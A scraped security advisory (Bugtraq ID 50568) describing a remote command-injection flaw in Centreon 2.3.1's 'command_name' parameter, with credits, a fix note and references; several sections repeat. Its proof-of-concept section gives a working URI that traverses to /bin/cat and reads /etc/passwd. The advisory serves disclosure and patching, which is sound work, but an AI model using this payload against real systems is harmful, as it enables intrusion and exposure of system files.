Centreon 'command_name' Parameter Remote Command Execution Vulnerability
BID:50568
Info
Centreon 'command_name' Parameter Remote Command Execution Vulnerability
| Bugtraq ID: | 50568 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 04 2011 12:00AM |
| Updated: | Nov 04 2011 12:00AM |
| Credit: | Christophe De La Fuente |
| Vulnerable: |
Centreon Centreon 2.3.1 |
| Not Vulnerable: |
Centreon Centreon 2.3.2 |
Discussion
Centreon 'command_name' Parameter Remote Command Execution Vulnerability
Centreon is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
Centreon 2.3.1 is affected; other versions may also be vulnerable.
Centreon is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
Centreon 2.3.1 is affected; other versions may also be vulnerable.
Exploit / POC
Centreon 'command_name' Parameter Remote Command Execution Vulnerability
Attackers can exploit this issue through a browser.
The following URI is available:
http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1
Attackers can exploit this issue through a browser.
The following URI is available:
http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1
Solution / Fix
Centreon 'command_name' Parameter Remote Command Execution Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Centreon 'command_name' Parameter Remote Command Execution Vulnerability
References:
References:
- centreon Homepage (centreon)
- Trustwave's SpiderLabs Security Advisory TWSL2011-017: Multiple Vulnerabilities (Christophe De La Fuente)